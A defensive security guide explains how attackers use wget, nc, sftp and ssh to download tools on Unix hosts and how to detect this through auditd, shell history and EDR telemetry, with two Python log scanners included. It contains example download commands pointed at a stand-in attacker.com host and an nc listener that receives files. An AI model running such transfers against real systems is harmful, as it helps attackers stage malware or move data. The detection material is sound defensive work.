File Download

File Download in *nix Systems: Tools and Detection

Attackers frequently use standard *nix utilities to download malicious tools or exfiltrate sensitive files. Below are common methods and detection strategies for identifying unauthorized file downloads.


Key Commands for File Download

1. wget Command

Purpose: Download files from web servers.

Example:

URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget "$URL" -O "$LFILE"

Detection:

  • Focus on the -O (long form --output-document) parameter, which specifies the output file.

  • Verify whether the destination (IP/domain) in the URL is trusted.

Detection Methods:

  • Audit Logs (command arguments are stored as a0=, a1=, ... fields of EXECVE records):

    grep "wget" /var/log/audit/audit.log | grep -e "-O"
  • Command History:

    history | grep "wget" | grep -e "-O"
    grep "wget" ~/.bash_history | grep -e "-O"
  • EDR/XDR Logs: Inspect wget processes and associated network traffic for unauthorized connections.

2. nc (Netcat) Command

Purpose: Transfer files using TCP or UDP.

Example:

On the sending (remote) system, which connects out and pushes the file:

nc target.com 12345 < "file_to_send"

On the receiving (target) system, which listens for the connection and writes the incoming stream to disk:

LPORT=12345
LFILE=file_to_save
nc -l -p "$LPORT" > "$LFILE"

Detection:

  • Look for -l (listen mode) together with the > operator to detect incoming file streams. The redirection is performed by the shell and is not part of nc's arguments, so audit and EDR process records show only nc -l -p 12345; the > is visible only in shell history.

Detection Methods:

  • Audit Logs:

    grep -w "nc" /var/log/audit/audit.log | grep -e "-l"
  • Command History:

    history | grep -w "nc" | grep -e "-l"
    grep -w "nc" ~/.bash_history | grep -e "-l"
  • EDR/XDR Logs: Analyze nc processes and network activity for unauthorized file transfers.

3. sftp Command

Purpose: Secure file transfer over SSH.

Example:

RHOST=user@attacker.com
sftp "$RHOST"
sftp> get file_to_get file_to_save

Detection:

  • Focus on get operations for file downloads. The get is typed inside the interactive sftp session, so it is recorded neither by auditd nor in ~/.bash_history (unless it is supplied through a -b batch file or the host:file form on the command line); on the client, the evidence is the sftp process, the remote host it connected to, and the new file it wrote.

  • Verify the legitimacy of remote destinations.

Detection Methods:

  • Audit Logs:

    grep -w "sftp" /var/log/audit/audit.log
  • Command History:

    history | grep -w "sftp"
    grep -w "sftp" ~/.bash_history
  • EDR/XDR Logs: Investigate sftp processes and network connections.

4. ssh Command

Purpose: Execute remote commands, including file transfers.

Example:

HOST=user@attacker.com
RPATH=file_to_get
LPATH=file_to_save
ssh "$HOST" "cat $RPATH" > "$LPATH"

Detection:

  • Monitor the > operator in conjunction with remote file viewing commands like cat. As with nc, the redirection lives in the shell, not in ssh's arguments; what audit and EDR process records do show is the remote command itself ("cat file_to_get"), which auditd hex-encodes in the EXECVE record because it contains a space.

Detection Methods:

  • Audit Logs:

    grep -w "ssh" /var/log/audit/audit.log
  • Command History:

    history | grep -w "ssh"
    grep -w "ssh" ~/.bash_history
  • EDR/XDR Logs: Examine ssh process events and parameters for unauthorized file retrievals.
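The four detection sections above grep the raw audit log for a tool name. As an added example that is not part of the original page, the following Python scanner parses auditd EXECVE records properly: it reconstructs argv (decoding the hex-encoded arguments auditd emits for values containing whitespace, such as the remote cat in the ssh example) and applies the page's indicators for wget, nc, sftp and ssh. The sample log lines, the hosts attacker.example and mirror.example, and the TRUSTED_HOSTS allowlist are constructed; the nc rule also accepts combined short flags such as -lp, which goes slightly beyond the page. It sees only execve arguments, so the > redirections in the nc and ssh examples are invisible to it, as they are to any process-based telemetry.

```python
import re

# Constructed sample auditd records (not real log data). auditd writes each
# execve() argument as a0=, a1=, ... fields and hex-encodes any argument that
# contains whitespace or quotes, as the ssh remote command in event 205 shows.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:201): arch=c000003e syscall=59 success=yes exit=0 comm="wget" exe="/usr/bin/wget" key="exec_log"
type=EXECVE msg=audit(1700000000.101:201): argc=4 a0="wget" a1="http://attacker.example/file_to_get" a2="-O" a3="file_to_save"
type=EXECVE msg=audit(1700000000.102:202): argc=2 a0="wget" a1="https://mirror.example/pkg.tar.gz"
type=EXECVE msg=audit(1700000000.103:203): argc=4 a0="nc" a1="-l" a2="-p" a3="12345"
type=EXECVE msg=audit(1700000000.104:204): argc=2 a0="sftp" a1="user@attacker.example"
type=EXECVE msg=audit(1700000000.105:205): argc=3 a0="ssh" a1="user@attacker.example" a2=6361742066696C655F746F5F676574
type=EXECVE msg=audit(1700000000.106:206): argc=2 a0="/usr/bin/rsync" a1="--version"
"""

DOWNLOAD_TOOLS = {"wget", "nc", "sftp", "ssh"}
TRUSTED_HOSTS = {"mirror.example"}  # assumed allowlist of known-good download sources

EVENT_RE = re.compile(r"msg=audit\(\d+\.\d+:(\d+)\)")
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for any other record type."""
    if not line.startswith("type=EXECVE"):
        return None
    event = EVENT_RE.search(line)
    if event is None:
        return None
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        # Hex-encoded arguments carry no quotes; decode them back to text.
        args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return event.group(1), [args[i] for i in sorted(args)]


def tool_name(argv):
    """Base name of the executed program (a0 may be a full path)."""
    return argv[0].rsplit("/", 1)[-1] if argv else ""


def remote_host(argv):
    """Best-effort remote host from a URL or user@host argument; None if there is none."""
    for arg in argv[1:]:
        url = re.match(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", arg)
        if url:
            return url.group(1)
        if "@" in arg and not arg.startswith("-"):
            return arg.split("@", 1)[1]
    return None


def classify(argv):
    """Apply the per-tool indicators from the page; return a reason string or None."""
    tool, opts = tool_name(argv), argv[1:]
    if tool == "wget" and any(o.startswith("-O") or o.startswith("--output-document") for o in opts):
        return "wget writing to an explicit output file (-O)"
    # Short flags may be combined (-lp 12345), so look for an 'l' in any short-option cluster.
    if tool == "nc" and any(o.startswith("-") and not o.startswith("--") and "l" in o[1:] for o in opts):
        return "nc in listen mode (-l): possible incoming file stream"
    if tool == "sftp":
        return "sftp session: check the remote host and any files written afterwards"
    if tool == "ssh" and any(re.match(r"\s*cat\b", o) for o in opts):
        return "ssh running a remote cat: file contents pulled over the session"
    return None


def scan(log_text, trusted_hosts=TRUSTED_HOSTS):
    """Scan auditd text and return one finding per suspicious download-tool execution."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_execve(line)
        if parsed is None:
            continue
        event_id, argv = parsed
        tool = tool_name(argv)
        if tool not in DOWNLOAD_TOOLS:
            continue
        reason, host = classify(argv), remote_host(argv)
        if reason is None:
            # No page indicator matched: report only if an untrusted remote host is named.
            if host is None or host in trusted_hosts:
                continue
            reason = f"{tool} contacting untrusted host {host}"
        findings.append({"event": event_id, "tool": tool, "host": host, "argv": argv, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_AUDIT_LOG):
        print(f"event {f['event']}: {f['reason']} :: {' '.join(f['argv'])}")
```

Run against the sample, events 201, 203, 204 and 205 are reported while the wget fetch from the allowlisted mirror (202) and the unrelated rsync (206) are not; point scan() at the real /var/log/audit/audit.log to use it on a host.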


General Detection Strategies

1. Monitor Known Tools

  • Regularly log and review commands like wget, nc, sftp, and ssh.

  • Pay close attention to connections with external or suspicious domains.

2. Check Network Traffic

  • Analyze outbound connections, especially to untrusted IPs or domains.

  • Use network monitoring tools to flag uncommon destinations or large data transfers.

3. Audit Logs

  • Regularly review /var/log/audit/audit.log for download-related commands. Command arguments are recorded only when an execve syscall rule is loaded, for example (the key name is arbitrary):

    -a always,exit -F arch=b64 -S execve -k exec_log

4. Command History

  • Inspect history files for any download-related activities. By default bash writes ~/.bash_history only when the shell exits, so a live session's commands show up in history but not yet in the file.

    history | grep -w "<command>"
    grep -w "<command>" ~/.bash_history

5. EDR/XDR Telemetry

  • Utilize endpoint detection tools to:

    • Correlate process events with network connections.

    • Detect and flag unauthorized file transfer patterns.
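Section 5 asks for process events to be correlated with network connections. As an added example that is not from the page or from any EDR product, this Python snippet joins constructed process-start and connection events on pid within a time window and flags download tools that talk to peers outside an assumed allowlist, nc listeners that accept an inbound connection, and unusually large inbound transfers. The event fields, the 203.0.113.10 and 198.51.100.5 addresses, the TRUSTED_NETS allowlist, the size threshold and the window length are all assumptions.

```python
import ipaddress

DOWNLOAD_TOOLS = {"wget", "nc", "sftp", "ssh"}

# Assumed allowlist: an internal range plus the address of an approved package mirror.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("198.51.100.5/32")]
LARGE_TRANSFER_BYTES = 1_000_000  # assumed threshold for "large data transfer"
WINDOW_SECONDS = 10.0             # how long after process start a connection is attributed to it

# Constructed EDR-style telemetry (not from any real product); ts is epoch seconds.
PROCESS_EVENTS = [
    {"ts": 1000.0, "pid": 4101, "exe": "/usr/bin/wget", "argv": ["wget", "http://203.0.113.10/file_to_get", "-O", "file_to_save"]},
    {"ts": 1001.0, "pid": 4102, "exe": "/usr/bin/wget", "argv": ["wget", "https://mirror.example/pkg.tar.gz"]},
    {"ts": 1002.0, "pid": 4103, "exe": "/bin/nc", "argv": ["nc", "-l", "-p", "12345"]},
    {"ts": 1003.0, "pid": 4104, "exe": "/usr/bin/ssh", "argv": ["ssh", "user@203.0.113.10", "cat file_to_get"]},
    {"ts": 1004.0, "pid": 4105, "exe": "/usr/bin/vim", "argv": ["vim", "notes.txt"]},
]
NETWORK_EVENTS = [
    {"ts": 1000.2, "pid": 4101, "direction": "outbound", "peer": "203.0.113.10", "port": 80, "bytes_in": 5_000_000},
    {"ts": 1001.3, "pid": 4102, "direction": "outbound", "peer": "198.51.100.5", "port": 443, "bytes_in": 20_000},
    {"ts": 1009.0, "pid": 4103, "direction": "inbound", "peer": "203.0.113.10", "port": 12345, "bytes_in": 300_000},
    {"ts": 1003.1, "pid": 4104, "direction": "outbound", "peer": "203.0.113.10", "port": 22, "bytes_in": 4_096},
    # Far outside the window: a later, unrelated process reusing pid 4101 must not be attributed to wget.
    {"ts": 1500.0, "pid": 4101, "direction": "outbound", "peer": "203.0.113.10", "port": 80, "bytes_in": 10},
]


def is_trusted(ip):
    """True when the peer address falls inside one of the allowlisted networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def correlate(process_events, network_events, window=WINDOW_SECONDS):
    """Attach each connection to the download-tool process with the same pid that
    started at most `window` seconds earlier, and report the suspicious pairs."""
    conns_by_pid = {}
    for n in network_events:
        conns_by_pid.setdefault(n["pid"], []).append(n)
    findings = []
    for p in process_events:
        tool = p["exe"].rsplit("/", 1)[-1]
        if tool not in DOWNLOAD_TOOLS:
            continue
        for n in sorted(conns_by_pid.get(p["pid"], []), key=lambda e: e["ts"]):
            if not p["ts"] <= n["ts"] <= p["ts"] + window:
                continue
            reasons = []
            if not is_trusted(n["peer"]):
                reasons.append(f"{n['direction']} connection with untrusted peer {n['peer']}:{n['port']}")
            if tool == "nc" and n["direction"] == "inbound":
                reasons.append("nc listener accepted a connection (incoming file stream)")
            if n["bytes_in"] >= LARGE_TRANSFER_BYTES:
                reasons.append(f"large inbound transfer of {n['bytes_in']} bytes")
            if reasons:
                findings.append({"pid": p["pid"], "tool": tool, "command": " ".join(p["argv"]),
                                 "peer": n["peer"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in correlate(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"pid {f['pid']} ({f['command']}): " + "; ".join(f["reasons"]))
```

The join key is pid plus a start-time window rather than pid alone, because pids are reused; in a real pipeline the process GUID your EDR assigns is the safer key, and the allowlist would come from asset inventory rather than a hard-coded list.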


Key Points

While utilities like wget, nc, sftp, and ssh serve legitimate purposes, they are often exploited for malicious file downloads. Continuous monitoring, combined with thorough log analysis and EDR/XDR telemetry, is essential to identify and mitigate these threats effectively. By proactively implementing these strategies, defenders can strengthen their security posture against unauthorized file transfer activities.
